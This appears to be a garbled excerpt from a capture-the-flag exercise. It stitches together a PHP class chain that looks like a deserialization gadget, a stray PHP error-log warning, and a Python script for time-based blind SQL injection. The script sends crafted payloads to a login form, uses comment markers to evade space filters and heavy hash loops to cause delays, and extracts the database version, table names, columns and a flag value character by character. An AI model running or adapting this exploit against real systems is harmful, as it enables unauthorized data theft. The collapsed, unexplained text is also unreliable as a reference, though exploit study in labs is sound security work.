classacp { public $cinder; public $neutron="1"; public $nova="1"; function__construct() { $this->cinder = new pkshow; } function__toString() { if (isset($this->cinder)) return$this->cinder->echo_name(); } }
Warning: error_log(/var/www/html/Data/Logs/21_09_17.log): failed to open stream: No such file or directory in /var/www/html/Inc/Functions.php on line 229
defsql_injection(payload:str): wd_tr="" for j in range(1,100): for i in range(32,128): #payload_fina=f"1'or/**/case/**/(select/**/hex(right(({payload}),{j}))/**/in/**/('{hex_tran(i)+wd_tr}'))/**/when/**/1/**/then/**/benchmark(100000,sha1(sha1(sha1(sha1(sha1(sha1(sha1('HWG'))))))))/**/else/**/1/**/end#" payload_fina =f"1'or/**/case/**/(select/**/ascii(mid(({payload}),{j},1)))/**/when/**/({i})/**/then/**/benchmark(1000000,sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1(sha1('HWG')))))))))))/**/else/**/1/**/end#" data={ "username":"admin", "password":payload_fina } print(data) times=time.time() r=s.post(url,data=data).text print(r) if time.time()-times >= 7: wd_tr+=chr(i) print(wd_tr) break if i==127: print(wd_tr) exit(0)
if __name__ =="__main__": payload="version()" #payload="database()" #payload="select group_concat(table_name) from information_schema.tables where table_schema in (select database())".replace(" ","/**/") #payload="select group_concat(table_name) from sys.schema_table_statistics".replace(" ","/**/") #payload="select group_concat(a.2) from (select 1,2,3 union select * from `users`)a".replace(" ","/**/") #payload="select group_concat(column_name) from information_schema.columns where table_name in ('Fl49ish3re')".replace(" ","/**/") #payload="select group_concat(f1aG123) from Fl49ish3re".replace(" ","/**/") sql_injection(payload)